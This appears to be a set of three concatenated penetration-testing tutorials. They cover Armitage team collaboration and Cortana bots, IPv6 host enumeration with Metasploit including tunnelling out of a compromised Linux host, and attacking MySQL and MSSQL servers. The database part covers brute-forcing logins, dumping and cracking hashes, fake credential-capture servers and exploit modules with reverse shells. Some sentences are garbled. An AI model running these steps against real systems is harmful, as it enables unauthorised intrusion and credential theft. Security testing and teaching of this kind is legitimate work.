Metasploit’s RPC daemon and the Armitage deconfliction server are not GUI programs. You may run these over SSH.

The Armitage team server communicates over SSL. When you start the team server, it will present a server fingerprint. This is a SHA-1 hash of the server’s SSL certificate. When your team members connect, Armitage will present the hash of the certificate the server presented to them. They should verify that these hashes match.

Do not connect to 127.0.0.1 when a teamserver is running. Armitage uses the IP address you’re connecting to determine whether it should use SSL (teamserver, remote address) or non-SSL (msfrpcd, localhost). You may connect Armitage to your teamserver locally, use the [external IP address] in the Host field.

Armitage’s red team collaboration setup is CPU sensitive and it likes RAM. Make sure you have 1.5GB of RAM in your team server.

Multi-Player Metasploit

Armitage’s red team collaboration mode adds a few new features. These are described here:

View -> Event Log opens a shared event log. You may type into this log and communicate as if you’re using an IRC chat room. In a penetration test this event log will help you reconstruct major events (Figure 14).

multi14

Figure 14. The event log

Multiple users may use any Meterpreter session at the same time. Each user may open one or more command shells, browse files, and take screenshots of the compromised host.

Metasploit shell sessions are automatically locked and unlocked when in use. If another user is interacting with a shell, Armitage will warn you that it’s in use.

Some Metasploit modules require you to specify one or more files. If a file option has a + next to it, then you may double-click that option name to choose a local file to use. Armitage will upload the chosen local file and set the option to its remote location for you. Generally, Armitage will do its best to move files between you and the shared Metasploit server to create the illusion that you’re using Metasploit locally.

Penetration testers will find this feature invaluable. Imagine you’re working on a pen test and come across a system you don’t know much about. You can reach back to your company and ask your local expert to load Armitage and connect to the same Metasploit instance. They will immediately have access to your scan data and they can interact with your existing sessions… seamlessly.

Or, imagine that you’re simulating a phishing attack and you get access to a host. Your whole team can now work on the same host. One person can search for data, another can set up a pivot and search for internal hosts to attack, and another can work on persistence. The sky is the limit here.

Some meterpreter commands may have shortened output. Multi-player Armitage takes the initial output from a command and delivers it to the client that sent the command. Additional output is ignored (although the command still executes normally). This limitation primarily affects long running meterpreter scripts.

Scripting Armitage

Cortana

Armitage includes Cortana, a scripting technology developed through DARPA’s Cyber Fast Track program. With Cortana, you may write red team bots and extend Armitage with new features. You may also make use of scripts written by others.

Cortana is based on Sleep, an extensible Perl-like language. Cortana scripts have a .cna suffix.

Read the Cortana Tutorial to learn more about how to develop bots and extend Armitage (Figure 15).

multi15

Figure 15. The Cortana Tutorial

Stand-alone Bots

A stand-alone version of Cortana is distributed with Armitage. You may connect the stand-alone Cortana interpreter to an Armitage team server.

Here’s a helloworld.cna Cortana script:

on ready { println(“Hello World!”); quit(); }

To run this script, you will need to start Cortana. First, stand-alone Cortana must connect to a team server. The team server is required because Cortana bots are another red team member.
If you want to connect multiple users to Metasploit, you have to start a team server.

Next, you will need to create a connect.prop file to tell Cortana how to connect to the team server you started. Here’s an example connect.prop file:

host=127.0.0.1 port=55553 user=msf pass=password nick=MyBot

Now, to launch your bot:

cd /path/to/metasploit/msf3/data/armitage

java -jar cortana.jar connect.prop helloworld.cna

Script Management

You don’t have to run Cortana bots stand-alone. You may load any bot into Armitage directly. When you load a bot into Armitage, you do not need to start a teamserver. Armitage is able to deconflict its actions from any loaded bots on its own.

You may also use Cortana scripts to extend Armitage and add new features to it. Cortana scripts may define keyboard shortcuts, insert menus into Armitage, and create simple user interfaces.

To load a script into Armitage, go to Armitage -> Scripts. Press Load and choose the script you would like to load. Scripts loaded in this way will be available each time Armitage starts.

Output generated by bots and Cortana commands are available in the Cortana console. Go to View -> Script Console.

 

Resources

Cortana is a full featured environment for developing red team bots and extending Armitage. If you’d like to learn more, take a look at the following resources:

Cortana Tutorial for Scripters

Public Cortana Script Repository

How to Explore the IPv6 Attack Surface with Metasploit

How to Explore the IPv6 Attack

Surface with Metasploit

fractal-292069_640

IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.

Earlier this year, the creators of the Metasploit Framework introduced support for IPv6. Adding tools to allow attackers and defenders to explore this brave new world, and the increased attack surface it can offer.

In this article we will introduce Metasploit’s three IPv6 enumeration modules, how to use them, and what they are doing “under the hood”. We’ll also cover the core IPv6 concepts that allow these modules to function as they do. Finally, we’ll take a look a configuring an IPv6 tunnel from a compromised host, to allow the use of a reverse connection IPv6 payload over the IPv6 Internet.

I find few commands as satisfying to execute as “msfupdate”. To many this may sound like a strange statement, but there are plenty of people who will completely understand where I’m coming from.

Every time I enter “msfupdate”, I sit back in my chair and watch as my copy of the Metasploit Framework connects to the Metasploit servers and downloads the latest modules. I run that command at least daily, and every time I do, it always grabs me something new to dissect and work into my penetration-testing toolbox.

met 1

Figure 1. Typical output from “msfupdate” containing new additions and updates to existing

I’m often surprised by the frequency and volume of some of the updates, but really I shouldn’t be. After all, the whole purpose of the Metasploit project is to provide a modular framework that allows exploits to be written in a standardized fashion to encourage community collaboration. Still, it’s refreshing to see that even after the project transitioned from a “pure” open source project to commercially owned and operated one (Metasploit was acquired by Rapid 7 in 2009), the community is still contributing, and those contributions are still released under the original open-source license. According to Rapid 7, this will never change.

Earlier this year “msfupdate” fetched some updates that made me lean forward faster and look a little closer than perhaps I normally would. Metasploit downloaded a selection of modules with “IPv6” in the description.

IPv6 has been creeping into our lives over the past several years. Our operating systems, network equipment and phones have been gradually adding support for the new version of the protocol that will keep future networks and the internet running, when the current version of the internet protocol (IPv4) is finally retired due to address space exhaustion.

As you might expect, IPv6 offers some advantages over its predecessor. Primarily, the vast address space will ensure that theoretically every grain of sand on the planet could own an Internet connected device and not have to worry about hiding behind a NAT’ed IP. Additionally, IPv6 supports stateless auto-configuration – meaning that network administrators will no longer have to set up and manage DHCP servers, as IPv6 can “figure itself out” via the use of such mechanisms as neighbor discovery protocol messages sent via ICMP version 6.

This is by no means an extensive list of differences, but I’d like to pause and consider the second “advantage” of IPv6 I’ve just mentioned from a security perspective. It’s this feature of IPv6 that the first batch of Metasploit IPv6 modules take advantage of.

One thing should be made very clear before we go any further. IPv6 is not any more or less secure than IPv4. They both do different things in different ways, and understanding the differences is key for network administrators to successfully implement the new protocol in a secure fashion. The biggest insecurity in IPv6 at the moment is that there are very few IPv6-only networks out there.

99% of the time you’ll find spots of IPv6 traffic wandering across the same wires as its older sibling, quietly going about its business. Similarly, 99% of the time you can ask a network administrator what they think that traffic is up to and they’ll reply with something along the lines of “erm, well that’s just noise, we don’t use IPv6 yet”.

They likely aren’t doing anything with v6 just yet, but that doesn’t mean the devices sitting on the network aren’t. Out of the box, IPv6 is designed to “go find the quickest way to the Internet”. When you think of it like that, perhaps it’s time for network admins to “get all up” in IPv6’s business and see what it’s up to. After all, if devices are using it to communicate freely, then so can we.

Currently Metasploit features a handful of scanner modules for IPv6 discovery, and IPv6 enabled versions of its traditional payloads. A quick and easy way to locate the IPv6 modules is to run the command “search ipv6” from within the Metasploit Console (Figure 2).

 met 2

Figure 2. Currently Metasploit offers three auxiliary scanner modules for IPv6 discovery and multiple payloads that run over IPv6

Let’s take a moment to dissect the scanner modules, and what we can learn from them. First up is “ipv6_multicast_ping”, written by wuntee.

This module sends a number of ICMPv6 packets to the various IPv6 addresses that are defined as multicast addresses, to which all IPv6 enabled hosts should respond. Then it listens for the ICMPv6 echo-reply responses and records both the IPv6 address and the hardware (MAC) address of the responding host. Very quickly we can learn which hosts on our local network are IPv6 enabled. When configuring the module we have the option of specifying the source IPv6 address and source MAC. The only mandatory option is a timeout, which is set at 5 seconds by default (Figure 3).

met 3

Figure 3. Quickly locating nearby IPv6 enabled hosts with ipv6_multicast_ping

Let’s take a closer look at the IPv6 multicast addresses we ping with this module. IPv6 addresses have a “scope” in which they are considered valid and unique. This could be an address in the global scope, the site scope, link-local or interface local scope. Each scope features a well-known multicast address, which certain types of host are expected to join. The module has a sequential list of those addresses that it works its way through. We can pull those addresses from the Ruby code for the module.

FF01::1 – All nodes on the interface-local scope.

FF01::2 – All routers in the interface-local scope.

FF02::1 – All nodes in the link-local scope.

FF02::2 – All routers on the link-local scope.

FF02::5 – All OSPFv3 link state routers.

FF02::6 – All OSPFv3 designated routers.

FF02::9 – All RIP routers.

FF02::a – All EIGRP routers.

FF02::d – All Protocol Independent Multicast routers.

FF02::16 – Multicast Lister Discovery reports.

FF02::1:2 – All DHCP servers in the link-local scope.

FF05::1:3 – All DHCP servers in the site-local scope.

To better understand the idea of IPv6 scopes we can compare them to their IPv4 equivalents. The global scope is best compared to any public IP address range in IPv4. A global IPv6 address can uniquely identify a host on the Internet. Site-local should be considered equivalent to RFC1918 private IP addressing and is used within a specific site, such as an office. Interface-local is similar to an APIPA or 169.* IPv4 address, and is automatically generated to allow communication across a link without the need for any other routing information.

One difference between link-local addresses in IPv6 and IPv4 is that there always needs to be one assigned to every IPv6 enabled interface – even when it has other addresses. That means that as long as there is IPv6 on the network, there will be link-local addresses in the link-local multicast scope. You can spot a link-local address because it will have the prefix “fe80”. As you might expect, these addresses cannot be routed over the Internet. So while they can be used to communicate with a machine in the same layer 2 broadcast domains as the host you are working from, if you want to be able to have fun across the IPv6 Internet, a global address is required. We’ll talk about obtaining one of those later.

Our next Metasploit module is “ipv6_neighbor”, created by belch <>. This enumeration module takes advantage of Neighbor Discovery Protocol (NDP). NDP uses a subset of ICMPv6 packets used by IPv6 to perform various auto-configuration and link state monitoring tasks to find the link-local addresses of IPv6 hosts within the same segment.

As an aside, one such NDP task is determining if it’s intended link-local address is already in use. This process, imaginatively called duplicate address detection (DAD), is actually prone to denial of service. Tools exist, although not presently modulized in Metasploit, which will respond to all DAD requests with “address in use” messages. This will prevent any new IPv6 devices that join the network from configuring a link-local address, as every option it advertises will be reported as a duplicate. One such tool for this task is “dos-new-ip6” written by van Hauser.

Back to the module in question. Its purpose is to take an IPv4 range and show you the relationship between the IPv4 and IPv6 addresses on the target network. This allows you to quickly identify which hosts are dual-stacked, that is, running both IPv4 and IPv6 side by side (Figure 4).

 met 5

Figure 4. Mapping the relationship between IPv4 and IPv6 link-local addresses

To do this it actually completes two tasks as part of its execution. The first is a blast from the past – we perform an ARP sweep of the given IPv4 range, to learn the MAC address of each IPv4 host. Secondly it will send an ICMPv6 neighbor solicitation packet, from which we’ll learn the MAC address of the IPv6 enabled host. Compare the two MAC addresses, if any match – we have our mapping.

Seeing these two processes side-by-side is interesting as ICMPv6 neighbor discovery is IPv6’s ARP replacement, and we can compare the way they go about doing the same job. Unlike IPv4, IPv6 does not implement broadcast. The reason for this is efficiency. Traditional ARP uses broadcast to query all the hosts on the subnet to find the MAC address of an IPv4 host so it can make a layer 2 delivery. In other words, everyone gets bugged every time someone wants to locate a MAC address.

In IPv6, the process relies on multicasting – which is means that fewer hosts get bugged and the address resolution process is much quicker.

Neighbor solicitation packets are sent to a special kind of multicast address – known as a solicited-node multicast address. Each IPv6 interface will have such an address and its purpose is to provide the layer 2 (mac address) of the host. These addresses are generated using an simple algorithm, which will drop all but the last 24 bits of the hosts regular unicast address and append it with the prefix FF02::1:FF00:0/104.

Using Wireshark to capture the ICMPv6 packets sent out by the Metasploit module we can see these addresses in action (Figure 5).

 met 6

Figure 5. ICMPv6 NDP packets, sent initially to the solicited-node multicast addresses of each host

Notice how in packets 231 and 232, we send a neighbor solicitation to the solicited-node multicast address ff02::1:ff8f:ddb3, and we get our response back in the form of a neighbor advertisement from the unicast link-local address of the host (fe80::7256:81ff:fe8f:ddb3). An ICMPv6 neighbor advertisement can either be sent in response to a solicitation, as we’ve just shown, or it can be sent unsolicited to an all-node multicast address to inform neighbors of a change in address or link state.

 

The final scanner module currently in Metasploit is ipv6_neighbour_router_advertisement, which like ipv6_multicast_ping is also written by wuntee.

ICMPv6 router advertisements and solicitations are fairly similar to neighbor advertisements and solicitations, but as you can probably guess, are used to discover routers rather than “regular” hosts. Routers transmit advertisements on a regular basis via multicast, and also in response to router solicitations from hosts on the network.

This module will aim to enumerate link-local IPv6 addresses by crafting and transmitting false router advertisements for a new network prefix via multicast. In turn this will trigger any hosts in that multicast scope to start the auto-configuration process, create a new global IPv6 address on its interface and send a neighbor advertisement for that address. The module will then manipulate the IPv6 address in the advertisement, dropping the newly acquired global prefix and replacing it with the standard link-local prefix. Finally, to confirm that the enumerated address is in fact alive it will send out a neighbor solicitation message.

This works under the assumption that the operating system uses the same interface portion of the IPv6 address on all of its addresses (Figure 6).

met 7

Figure 6. Using false router advertisements with “ipv6_neighbor_router_advertisement” to obtain link-local addresses

So let’s take a closer look at the module in action. We don’t need to provide any options other than a couple of timeout parameters, which by default are set at 5 and 1 seconds respectively. Once we run the module it will begin sending advertisements for the network prefix 2001:1234:dead:beef to the multicast address FF02::1, which as we know from earlier is “all nodes in the link-local scope”. Incidentally, this network prefix is hard coded into the module’s source (Figure 7).

Upon receipt of the advertisement all hosts on the local scope will begin auto-configuration of a new IPv6 address within the new prefix (Figure 8).

 met 8

Figure 7. Sending an ICMPv6 router advertisement message for the network prefix “2001:1234:dead:beef”, as captured by Wireshark

Of the three enumeration modules we’ve looked at, this is by far the nosiest and therefore the most likely to be detected. We are actually taking the time to set an address on the remote host, and there is no guarantee that the interface portion of the new address will match the link-local address calculated by the module. Some systems implement randomization in the interface portion. Having said that, it’s always good to have different ways of achieving the same goal!

met 9

met 82

Figure 8. Two outputs of “ifconfig” on a Mac OS X machine on the same network as our Metasploit instance. The first output is pre-false advertisement, the second is just after. Notice the addition of a “dead:beef” IPv6 address, thanks to auto-configuration

So far we’ve concentrated on the auxiliary modules in the Metasploit framework and doing some basic IPv6 enumeration in the link-local scope. This is an important first step and assumes that you already have some sort of foothold into the network, but let’s say we now want to take things one-step further. We are going to try a break out onto the IPv6 Internet, and that means we’ll need a tunnel.

The idea of tunneling out using IPv6 encapsulated in IPv4 packets is a very attractive proposition, as many controls, such as IPS/IDS and firewalls will not be configured to alert on or prevent such traffic leaving.

So the scenario is as follows – we’ve compromised a Linux machine using Metasploit and we have a shell. The host has IPv6 support and a link-local address. Now we want to create a global IPv6 address on the box to allow it to communicate back to us over the IPv6 Internet for extra obscurity.

You need two things to get an IPv6 tunnel to work – a tunnel broker, of which there are plenty, many of them are free of charge. Secondly, if the box you are working on is behind a NAT device, it must support the forwarding of protocol 41 – in other words, IPv6 encapsulated in IPv4. If we are behind a NAT device that doesn’t forward protocol 41, we are out of luck (Figure 9).

met 92

Figure 9. On the compromised Linux host “webapp1”, eth0 has an IPv4, and link-local IPv6 address

For the purposes of this example I’ll be using a tunnel provided by Hurricane Electric (he.net). Once signed up, the tunnel broker provides both a client and server IPv6 address, and an IPv4 address of the tunnel broker server.

These values will be as follows:

HE.net Tunnel Server IPv4 address – 72.52.104.74

HE.net Tunnel Server IPv6 address – 2001:DB8::20

Target Network Outside NAT IPv4 address – 1.1.1.1

Target Machine IPv4 Address – 192.168.0.115

Target Machine IPv6 Address – 2001:DB8::21

Note

You may have noticed the outside IPv4 and IPv6 addresses used in this example will not work in real life. The IPv6 address prefix I’ve used is reserved for documentation, and is not routable over the Internet.

When configuring the tunnel in the he.net site, you must provide the outside IPv4 address of the target. It should also be noted, that he.net site requires that this address responds to ping (Figure 10).

 met 10

Figure 10. Signing up for an IPv6 tunnel from Hurricane Electric (ipv6.he.net)

Back on our victim machine, we run a few commands to bring up the new tunnel interface and set up a route to ensure all IPv6 traffic goes via that new interface.

ip tunnel add ipv6inet mode sit remote 72.52.104.74 local 192.168.0.115 ttl 255” – This creates a SIT (simple internet transition) interface named ipv6inet and defines the local and remote IPv4 addresses for the tunnel endpoints, or in other words, the IP of the target machine and tunnel server.

ip link set ipv6inet up” – This brings the tunnel interface up.

ip addr add 2001:db8::21 dev ipv6inet – This assigns the IPv6 address to the interface.

ip route add ::/0 dev ipv6inet – This command will add a route to send all IPv6 traffic across the new tunnel interface (Figure 11).

 met 11

Figure 11. Creating an IPv6 tunnel interface on the target machine

A quick way to confirm that the IPv6 Internet is now within our reach is to use the ping6 utility to hit an IPv6 website. In this case ipv6.google.com, which has the address 2607:f8b0:400e:c00::93.

 met 12

Figure 12. Sending ping packets to Google over the IPv6 Internet using our new tunnel interface

This tunnel can now be used by a Metasploit reverse connection payload to connect to an attacker with a global IPv6 address of their own, which of course can be obtained in exactly the same way as we’ve just shown.

Let’s say in this example we want our payload to connect back to us at the address 2001:db8::99 (Figure 13).

met 13

Figure 13. Setting up an IPv6 payload in Metasploit

Configuring an IPv6 payload in Metasploit is essentially the same as an IPv4 payload, but there are a couple of minor differences. Obviously, you must specify an IPv6 address for your listener (or target if a binding payload), and also if using a link-local address on a host with multiple interfaces, you should specify the scope ID.

To summarize, let’s take one last look at the scenario we’ve just discussed (Figure 14).

met 14

Figure 14. An overview of our IPv6-over-IPv4 tunnel set u

Conclusion

For many out there, the mere sight of an IPv6 address is enough to put them off learning more about the protocol. This is the biggest vulnerability in IPv6, and like most security vulnerabilities, it’s a human problem. The protocol is being adopted in devices at a much quicker rate than people are willing to manage and configure it properly.

For attackers, this provides great opportunities to jump on the unmanaged jumble and use it to build something that can be used to move around networks in ways that the owners of those networks aren’t expecting.

For defenders, this means developing a whole new security model with emphasis on securing the endpoints rather than the perimeter. After all, IPv6 doesn’t hide behind NAT like its predecessor.

By introducing IPv6 payloads and modules the Metasploit framework has given both groups new tools to better understand and manipulate the IPv6 protocol. Of course, we are only just getting started. The nature of the Metasploit community is to constantly build, innovate and improve upon what is already in place. These initial modules will act as a catalyst for further development in IPv6 enumeration and exploitation. Remember that the next time you run “msfupdate”, and keep one eye open for new ways to use IPv6 for exploitation.

How To Use SqlPloit

How to use Sqlploit

 monitor-68156_640

Databases nowdays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information are stored in database servers that are often poorly secured.

Someone an to this information could have control over a company’s or an organization’s infrastructure. He could even sell this information to a company’s competitors. Imagine the damage that something like this could cause. In this article, we will see how we can use Metasploit to attack our database servers.

Metasploit is a very powerful tool. Actually, is not just a tool, it is a collection of tools. It is a whole framework. It has gained incredible popularity in the last few years because of its success in the fields of penetration testing and information security. It includes various tools, from various scanners to exploits. It can be used to discover software vulnerabilities and exploit them. With database servers having so many security weaknesses, Metasploit has numerous auxiliary modules and exploits to assist you with your database server penetration testing. Metasploit is available for all popular operating systems so what operating system you are already using might not be a problem. In this article we are going to use Metasploit’s auxiliary modules and exploits to complete various penetration testing tasks against popular database servers, such as Microsoft SQL Server and MySQL. I hope you enjoy it!

Attacking a MySQL Database Server

MySQL is the world’s most used open source relational database management system. Its source code is available under the terms of the GNU General Public License and other proprietary license agreements. MySQL is the first database choice when it comes to open source applications creation. MySQL is a very secure database system, but as with any software that is publicly accessible, you can’t take anything for granted.

sql1

Figure 1. Discovering MySQL servers – The nmap wa

Discover open MySQL ports

MySQL is running by default on port 3306. To discover MySQL you can do it either with nmap or with Metasploit’s auxiliary modules.

The NMAP way

Nmap is a free and open source network discovery and security auditing utility. It can discover open ports, running services, operating system version and much more. To discover open MySQL ports we use it in this way:

nmap -sT -sV -Pn -p 3306 192.168.200.133

Parameters:

-sT: TCP connect scan

-sV: Determine Service version information

-Pn: Ignore Host discovery

-p 3306: Scan port 3306

Scanning the whole network:

nmap -sT -sV -Pn -–open -p 3306 192.168.200.0/24

Parameters:

–open: Show only open ports (Figure 2)

sql2

Figure 2. Discovering MySQL servers – The nmap way

 

The Metasploit way

Metasploit offers auxiliary module mysql_version. This module enumerates the version of running MySQL servers. To use it type:

use auxiliary/scanner/mysql/mysql_version

To use this scanner you have to set its options. Type:

show options

To see a list of available options (Figure 3).

sql3

Figure 3. mysql_version auxiliary module options

Set the RHOSTS parameter:

set RHOSTS 192.168.200.133

or

set RHOSTS 192.168.200.0/24

Set the RPORT parameter to a different value if you believe that the MySQL Server is listening on a different port:

Set RPORT 3333

Increase THREADS value for a faster scanning (Figure 4):

sql4

Figure 4. mysql_version options after setting them up

 

set THREADS 50

Now, all you have to type is:

run

and hit enter (Figure 5).

sql5

Figure 5. mysql_version scanner in action

As you can see from the screenshot we have a MySQL version 5.0.51a running at 192.168.200.133!

Brute forcing MySQL

There is an auxiliary module in Metasploit called mysql_login which will happily query a mysql server for specific usernames and passwords. The options for this module are: Figure 6.

 sql6

Figure 6. mysql_login module options

To start your attack you have to set the RHOSTS option and choose a username and a password.

SET RHOSTS 192.168.200.133

SET USERNAME root

Leave the password blank. Your options, after executing the commands above, should seem like Figure 6. mysql_login will try to login with blank password and with the username as the password. Maybe we are lucky before we start brute-forcing database with passwords lists (Figure 7).

sql7

Figure 7. Starting brute-forcing database with passwords lists

We were lucky! The administrator is completely ignorant. But what if we weren’t so lucky? We then need a password list file. We can create one by ourselves or download one from the Internet. Let’s create one!

Creating a password list

To create our password list we are going to use crunch. If you are using BackTrack, crunch is already installed. Open Privilege Escalation > Password Attacks > Offline Attacks > crunch. Otherwise download it from here http://sourceforge.net/projects/crunch-wordlist/.

Execute:

./crunch 6 8 abcde123456 -o passfile.lst

The above command will create passwords between 6 and 8 characters long, consisting of ascii characters a,b,c,d,e and numbers 1,2,3,4,5,6 and will save the list into file passfile.lst (Figure 8).

 sql8

Figure 8. Generating a password list with crunch

Using password lists

Now that we have our password list stored in /pentest/passwords/crunch/passfile.lst, we can use it in mysql_login module.

Set PASS_FILE /pentest/passwords/crunch/passfile.lst

Increase also the number of concurrent threads for a faster brute-force attack.

SET THREADS 50

run

mysql_login (Figure 9) module offers 2 other options, USER_FILE and USERPASS_FILE. You can use a username file list to try various username values by setting the USER_FILE option accordingly. With USERPASS_FILE parameter you can use a file which contains both usernames and passwords in the same file separated by space and one pair per line.

sql9

Figure 9. mysql brute-force attack using password list

Bypass MySQL Authentication

Module mysql_authbypass_hashdump exploits a password bypass vulnerability in MySQL and can extract usernames and encrypted passwords hashes from a MySQL server. To select it type:

use auxiliary/scanner/mysql/mysql_hashdump

Set RHOSTS and THREADS option:

set RHOSTS 192.168.200.133

set THREADS 50

and run the module. We can also set parameter username.

set username root

Unlucky! (Figure 10)

sql10

Figure 10. Running mysql_authbypass_hashdump module

Dump MySQL Password Hashes

mysql_hashdump extracts the usernames and encrypted password hashes from a MySQL server. One can then use jtr_mysql_fast module to crack them. The module is located in auxiliary/scanner/mysql. To use it set RHOSTS option to our target’s IP address and increase THREADS value. If you have managed to reveal root password then set also options USERNAME and PASSWORD. Run the module to get your precious results! (Figure 11)

sql11

Figure 11. mysql server hashes and usernames

Cracking passwords with John The Ripper

Metasploit offers module jtr_mysql_fast.This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. John the Ripper is a free and Open Source software password cracker, available for many operating systems such as Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. After having acquired mysql hashes with mysql_hashdump module, load jtr_mysql_fast module and run it.

use auxiliary/analyze/jtr_mysql_fast

run

This module offers options such as setting a custom path for john the ripper. The option that interests you the most is the Wordlist option, which is a path to your desired password list (Figure 12).

sql12

Figure 12. jtr_mysql_fast module options

Getting the schema

A database schema describes in a formal language the structure of the database, the organization of the data, how the tables, their fields and their relationships between them must be defined and more. In general, database schema defines the way the database should be constructed. Metasploit has the module mysql_schemadump to get MySQL schema. mysql_schemadump is located under auxiliary/scanner/mysql. To use it you have to set RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one hosts increase THREADS value!

Let’s go Phishing

Phishing is an attempt to steal sensitive information by impersonating a well known organization. In the same manner you can trick a user to steal her MySQL credentials. One of the abilities of Metasploit is this, mimic known services and capture user credentials. Among the various capture modules there is a module called mysql. This module provides a fake MySQL service that is designed to capture MySQL server authentication credentials. It captures challenge and response pairs that can be supplied to Cain or John the Ripper for cracking.

To select the capture module type:

use auxiliary/server/capture/mysql

This module offers some interesting options. You can set CAINPWFILE option to store captured hashes in Cain&Abel format or JOHNPWFILE to store hashes in John The Ripper format. Leave SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can also set the SRVVERSION option, which is the version of the mysql server that will be reported to clients in the greeting response. This option must agree with the true mysql server version on the network if you don’t want to being detected. You can also configure the module to use SSL! (Figure 13)

sql13

Figure 13. mysql capture module options

Run the module and connect to the capture mysql server from another computer on the network to see how it is working. To connect to a mysql server open a terminal and type:

mysql -h ip_address -u root -p

Enter any password, for now, in mysql’s prompt and see what is happening in Metasploit! (Figure 14)

sql14

Figure 14. mysql capture module in action

Metasploit has captured the hash and now this hash is stored in cain and john format in files /tmp/john and /tmp/cain. These are the files that I have chosen.

Cain Format

root NULL

94e243cab3181cvef73852s3011651369196a928

112263447569708899agbbfcddneff2113434455 SHA1

John format

root:$mysqlna$1112263447569708899agbb

fcddneff2113434455 *

94e243cab3181cvef73852s3011651369196a928

MySQL Exploiting

MySQL database system is a very secure piece of software. Metasploit doesn’t offer many MySQL exploits. Although some exploits exist.

YaSSL Exploits

YaSSL is a lightweight embedded SSL library. Metasploit offers 2 exploits for this library. The mysql_yassl_getname and the mysql_yassl_hello. The mysql_yassl_getname exploits a stack buffer overflow in the yaSSL 1.9.8 and earlier and mysql_yassl_hello exploits a stack buffer overflow in the yaSSL 1.7.5 and earlier. To use any exploit you have to select it:

use exploit/linux/mysql/mysql_yassl_getname

use exploit/linux/mysql/mysql_yassl_hello

use exploit/windows/mysql/mysql_yassl_hello

As you can figure, the last exploit is for windows systems. After selecting your desired exploit, you have to select the payload. Each exploit offers a variety of payloads. You have to choose the most suitable for your target. To see a list of available payloads for the exploit type (Figure 15):

show payloads

sql15

Figure 15. Exploit’s and payload’s options

The most successful exploits usually are the reverse_tcp payloads where the target machine connects back to you. Each payload offers some options. By typing

show options

you will see exploit’s and payload’s options (Figure 16).

sql16

Figure 16. mysql_yassl_hello exploit payloads

 

Other MySQL Exploits

We should mention here two more exploits that are available for MySQL systems that run on Windows servers. The mysql_payload and the scrutinizer_upload_exec. The first exploit, mysql_payload, creates and enables a custom UDF on the target. On default Microsoft Windows installations of MySQL 5.5.9 and earlier, directory write permissions are not enforced, and the MySQL service runs as LocalSystem. This module will leave a payload executable on the target system and the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions. The scrutinizer_upload_exec module exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer, a network traffic monitoring and analysis tool. By default, the software installs a default password in MySQL, and binds the service to “0.0.0.0”. This allows any remote user to login to MySQL, and then gain arbitrary remote code execution under the context of ‘SYSTEM’.

We are in!

And now what? Metasploit offers two modules that will assist you to enumerate a MySQL service or execute sql queries. All you need is a valid user-password pair. mysql_enum allows for simple enumeration of MySQL Database Server and mysql_sql allows for simple SQL statements to be executed against a MySQL instance. To select them, type:

use auxiliary/admin/mysql/mysql_enum

and execute the command

show options

to get a list of available options (Figure 17).

sql17

Figure 17. mysql_enum module option

To use mysql_sql execute (Figure 18):

sql18

Figure 18. mysql_sql module options

use auxiliary/admin/mysql/mysql_sql

and

show options

Attacking a Microsoft SQL Server

Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) used to store, retrieve and manage information. As with many Microsoft’s products, SQL Server has many security weaknesses. Let’s start by identifying running SQL servers on the network.

Discover open MSSQL ports

MSSQL is running by default on port 1433. To discover SQL Server you can use either nmap or Metasploit’s auxiliary module.

The NMAP way

To discover open MSSQL ports we execute the following command:

nmap -sT -sV -Pn -p 1433 192.168.200.133

Usually administrators, when they need more than one instances of SQL server they run the second instance at port 1434.

nmap -sT -sV -Pn -p 1433,1434 192.168.200.133

Parameters:

-sT: TCP connect scan

-sV: Determine Service version information

-Pn: Ignore Host discovery

-p 1433,1434: Scan port 1433 and 1434

Scanning the whole network

nmap -sT -sV -Pn -–open -p 1433,1434 192.168.200.0/24

Parameters:

–open: Show only open ports

The Metasploit way

Metasploit offers auxiliary module mssql_ping. This module discovers running MSSQL services. To use it, type:

use auxiliary/scanner/mssql/mssql_ping

Type:

show options

for a list of available options (Figure 19).

sql19

Figure 19. mssql_ping module options

To discover all running MSSQL services on the net, set RHOSTS value equal to 192.168.200.0/24, assuming that your target network is in this range, increase threads value for a faster scanning and run the module (Figure 20).

sql20

Figure 20. mssql_ping module in action

Brute forcing MSSQL

Auxiliary module mssql_login is working in the same manner as mysql_login does. It will query the MSSQL instance for a specific username and password pair. The options for this module are: Figure 21.

sql21

Figure 21. mssql_login options

The default administrator’s username for SQL server is sa. In the options of this module, you can specify a specific password, or a password list, a username list or a username-password list where usernames and passwords are separated by space and each pair is in a new line. Having set your options simply run the module and wait for your results! You can create your own password list file, like we did in the first chapter where we used mysql_login module.

Dump MSSQL Password Hashes

mssql_hashdump extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking with jtr_mssql_fast. This module also saves information about the server version and table names, which can be used to seed the wordlist. The module is located in auxiliary/scanner/mssql. To use it set RHOSTS option to our target’s ip address and increase THREADS value to 50. If you have managed to reveal root password then set also options USERNAME and PASSWORD. Run the module! (Figure 22).

sql22

Figure 22. mssql_hashdump module

Cracking mssql passwords with John The Ripper

Metasploit offers module jtr_mssql_fast. This module works in the same manner as jtr_mysql_fast does. It uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. After having acquire mssql encrypted hashes with mssql_hashdump module, load jtr_mssql_fast and run it.

use auxiliary/analyze/jtr_mssql_fast

and

run

You should set the Wordlist option which is the path to your desired password list (Figure 23).

 sql23

Figure 23. jtr_mssql_fast module options

Getting Microsoft SQL Server schema

Metasploit offers the module mssql_schemadump to retrieve MSSQL schema. mssql_schemadump is located under auxiliary/scanner/mssql. This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master,model,msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.To use it you have to set RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one hosts increase the THREADS value to get results faster.

Phishing with MSSQL

Metasploit has also a mssql capture module, called mssql. This module provides a fake MSSQL service that is designed to capture MSSQL server authentication credentials. The module supports both the weak encoded database logins as well as Windows login (NTLM). To select the capture module type:

use auxiliary/server/capture/mssql

